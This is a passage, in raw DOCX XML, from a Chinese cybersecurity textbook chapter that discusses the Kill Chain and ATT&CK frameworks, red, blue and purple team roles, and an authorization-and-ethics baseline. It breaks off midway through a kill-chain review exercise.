          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">为了更本质地理解这一互补关系，我们可以从信息论的角度来审视：杀伤链关注攻击序列的时间熵增过程——随着攻击阶段的后移，系统的混乱程度增加，防御者重构攻击全貌的难度也随之上升，直到攻击者达成目标的那一刻，系统的信息熵达到局部极大值。ATT&amp;CK</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">则关注敌手行为空间的拓扑结构——每一种技术和子技术代表着攻击者在战术目标约束下的一个行为选项，所有选项的集合构成了敌手的行为空间。蓝队的任务可以理解为，通过部署检测探针，尽可能缩小攻击者在行为空间中能够“静默通行”的区域半径。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">此外，本节在介绍这两个框架作为全书“攻击阶段地图”的同时，必须声明本书模型与真实复杂威胁之间的边界，以防止读者产生“框架可以完美预测所有攻击”的误解。无论是杀伤链还是</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">ATT&amp;CK，都是对网络世界真实入侵行为的一种模式化抽象。它们是理解攻击的思维脚手架，而不是预言攻击的精确蓝图。一个具备长期运营能力的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> APT </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">攻击者，其行动序列可能深度嵌套、多线并进，并针对特定防御体系进行积极规避，从而在观测者（蓝队）视角中，其行为在杀伤链或</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ATT&amp;CK </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">上的映射会出现阶段边界的模糊、跳跃或者刻意伪造。更具体地说，杀伤链假定了一个由外向内、再横向扩展的宏观方向感，但面对内部威胁或通过供应链投递的攻击时，杀伤链的“侦察”和“投递”阶段可能完全消失；而</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ATT&amp;CK </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">矩阵虽然庞大，但它主要汇聚了已公开的攻击案例，并不能覆盖尚未曝光的、由国家级力量持有的未知技术。读者必须清醒地认识到，工具与框架是为了辅助思考，而非替代思考。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">因此，攻防对抗的最终落脚点，是人利用框架进行的理性判断与决策。攻击者使用杀伤链来寻找防御体系中最薄弱的、可被击穿的链环（The</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> weakest </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">link）；防御者使用</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ATT&amp;CK </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">来寻找自身监控体系中最大的盲区（The</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> blind </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">spot）。这种围绕“地图”展开的攻防博弈，将被渗透到本书后续的所有章节之中。在接下来的章节中，读者将首先搭建承载所有攻防对抗的物理与网络隔离沙盒（第</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 2 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">章），然后学习将攻击行动规范化的渗透测试执行标准（第</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 3 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">章），此后的每一个攻击实操步骤，都将严格落位于本节建立的地图坐标系之内。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">然而，仅有攻击阶段地图尚不足以完成攻防闭环；在真实的对抗环境中，这些框架必须由具体角色的分工与协同来执行。下一节将以此为出发点，系统阐述红队、蓝队与紫队的职责、协作模式以及贯穿全书的攻防对称教学原则。</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="23"/>
    <w:bookmarkStart w:id="24" w:name="红队蓝队紫队习题小结延伸"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">1.3 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">红队·蓝队·紫队·习题·小结·延伸</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">攻防对抗并非孤立的技术比拼，而是组织内不同角色协同作用的系统工程。本书从第一章起便确立一个核心原则：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">攻击与防御是同一枚硬币的两面</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">。学习者若只知攻击而不晓防御，充其量只能成为脚本小子；仅通防御而不解攻击，则无异于纸上谈兵。因此，在勾勒完整杀伤链与</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ATT&amp;CK </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">地图之后，必须明确红队、蓝队与紫队在攻防生态中的分工与协作，并在此基础上厘清本书的教学伦理底线——攻防对称。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">授权与隔离声明框（全书基线）</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">&gt; </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">本章虽无实际操作，但本书后续所有涉及工具运行的章节均以授权环境为前提。读者进行渗透测试、漏洞利用、网络扫描等任何技术活动时，必须确保处于</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">自建隔离实验室、官方授权靶机（如HackTheBox、TryHackMe、VulnHub、OWASP镜像）或获得书面授权的系统</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">之内。实验网络必须与生产网络及互联网进行物理或逻辑隔离。未经授权访问他人计算机系统属违法行为，本书作者与出版方不承担任何因滥用技术内容而导致的法律责任。</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="24"/>
    <w:bookmarkStart w:id="25" w:name="攻防对称本书的伦理底线与教学完整性"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">攻防对称：本书的伦理底线与教学完整性</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">现实世界中，攻击者与防御者处于典型的非对称博弈之中：攻击者只需发现一个可利用的漏洞，而防御者必须守护所有可能的攻击面。这种不对等常使安全从业者过度聚焦于攻击视角，忽视防御体系的构建。然而，一本负责任的安全教材必须拒绝这种倾向。本书每介绍一种攻击技术，必立即配以</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">“防御对照框”</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">——说明蓝队如何检测该行为、如何从配置或架构层面加以缓解。例如，在后续章节讲述端口扫描时，会同步讲解防火墙日志分析；讲解</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> SQL </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">注入时，会同步给出参数化查询与</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Web </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">应用防火墙（WAF）规则。这种“攻击—防御”配对的结构化呈现，构成了本书教学完整性的基石。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">从知识体系上看，攻防对称亦根植于馆藏路线。《从位到物联》所讲授的协议行为（Ch24–28）与系统机制（Ch13–18）本身并无善恶，它们既可被攻击者利用，也可供防御者部署监测。本书的任务是在此基础上增加攻防视角，使读者既能理解</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> TCP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">三次握手如何被用于</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> SYN </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">洪水攻击（红队），也能掌握如何通过</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> SYN Cookie </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">与连接速率限制加以抵御（蓝队）。这种双向能力的培养，最终将导向</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">紫队（Purple</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Team）</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">思维——一种攻防协同、持续改进的安全姿势。</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="25"/>
    <w:bookmarkStart w:id="26" w:name="红队蓝队与紫队角色与协作"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">红队、蓝队与紫队：角色与协作</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">红队（Red</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Team）</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">是授权的攻击模拟者。其使命不是单纯地“攻破系统”，而是以受控的方式复现真实威胁行为体的战术、技术和流程（TTP），从而暴露防御体系的薄弱环节。红队行动通常以杀伤链（Cyber</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Kill </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Chain）或</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ATT&amp;CK </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">矩阵为规划地图：从外部侦察、武器化、投递，到内部立足、横向移动、达成目标。在本书后续章节中，卷二（侦察与信息收集）、卷三（Web</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">应用攻击）、卷四（系统与二进制漏洞利用）均主要站在红队视角展开。然而，本书坚决遵循武器化红线：所有红队技术均在授权靶机环境中教学，并以“最小教学示例”呈现；不教授</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> AV/EDR </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">绕过、反取证等实操细节；对于栈溢出、shellcode</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">等敏感主题，必须在讲解</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ASLR、NX、Stack Canary </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">等缓解机制后方可进行，且仅限</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> CTF </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">级题目。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">蓝队（Blue</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Team）</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">是防御体系的构建者与运营者。其核心职责包括安全监控、事件检测、入侵响应与根因分析。蓝队并不被动等待攻击发生，而是基于威胁情报和已知攻击行为（常映射至</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ATT&amp;CK </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">技术）主动构建检测规则。例如，针对红队可能使用的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">“C2 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">通信”</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">（ATT&amp;CK</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">T1071.001），蓝队会在网络流量中监测异常</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> DNS </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">请求或</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Beacon </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">心跳。本书卷五（防御、监测与威胁狩猎）集中阐述蓝队方法，但防御思维在全书各章中均以防御框形式提前渗透。值得注意的是，蓝队能力与《从位到物联》网络卷（Ch28</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">TLS、防火墙、ACL）和系统卷（Ch16</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">内存保护）形成呼应，本书在此基础上进一步讲解如何解读日志、编写</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Snort/Sigma </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">规则、执行应急响应。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">紫队（Purple</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Team）</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">并非独立的第三方团队，而是红蓝协同的工作模式与理念。传统上，红队完成攻击后提交报告，蓝队根据报告修补漏洞，这种串行流程周期长、反馈慢。紫队模式强调在安全的攻击作业中，红蓝双方实时沟通——红队展示攻击路径与使用的技术，蓝队当场验证检测规则是否触发，并调整监控策略。例如，红队运行一个针对</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Web </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">应用的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> SQL </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">注入，蓝队同步检查</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> WAF </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">日志和数据库审计记录，若未告警则立即调整规则。这种“攻击-检测-修正”的闭环极大缩短了安全改进的周期。本书通过每节中“攻击正文+防御对照框”的编排，本质上就是在阅读层面模拟紫队协同：读者在理解攻击原理之后，立刻被引导思考如何检测与修复，从而在观念上建立起紫队思维。在卷五中，还会专门设计综合实验，要求读者在隔离环境中同时扮演红蓝双方，完成从侦察到入侵，再到日志分析、威胁狩猎的完整循环。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">上述三种角色的协作，是对抗性安全能力建设的理想模式。但必须明确，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">任何红队活动的合法性完全来源于授权范围（Rules</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> of Engagement, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">RoE）</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">。即使是内部红队，也必须在明确的授权文件、时间窗口、目标范围和禁止动作清单下工作。未经授权即开展攻击模拟，不论动机如何，均构成违法行为。本书第三章将进一步详解</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> RoE </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">与渗透测试方法框架，此处仅作为伦理基线的重申。</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="26"/>
    <w:bookmarkStart w:id="29" w:name="习题"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">习题</w:t>
      </w:r>
    </w:p>
    <w:bookmarkStart w:id="27" w:name="习题-1.3.1-杀伤链阶段复述"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">习题</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 1.3.1 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">杀伤链阶段复述</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">题目</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：请凭记忆列出网络杀伤链（Cyber</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Kill </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Chain）的七个阶段，并简要描述每一阶段攻击者的主要行为。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">提示</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：回忆</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 1.2 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">节中</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Mermaid </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">流程图，从侦察开始至目标行动，共七个环节。注意区分“投递”与“利用”的边界。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">解答</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：杀伤链七阶段为：</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">1.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">侦察（Reconnaissance）</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：攻击者收集目标信息，如</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> IP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">段、域名、员工邮箱、开放端口等。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">2.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">武器化（Weaponization）</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：将恶意载荷与利用代码结合，生成恶意文档或可执行文件。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">3.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">投递（Delivery）</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：将武器化载体送达目标，例如钓鱼邮件附件、恶意</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> USB </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">投放、水坑攻击等。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">4.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">利用（Exploitation）</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：触发漏洞以在目标系统上执行代码。通常是针对应用程序或操作系统的已知或零日漏洞。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">5.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">安装（Installation）</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
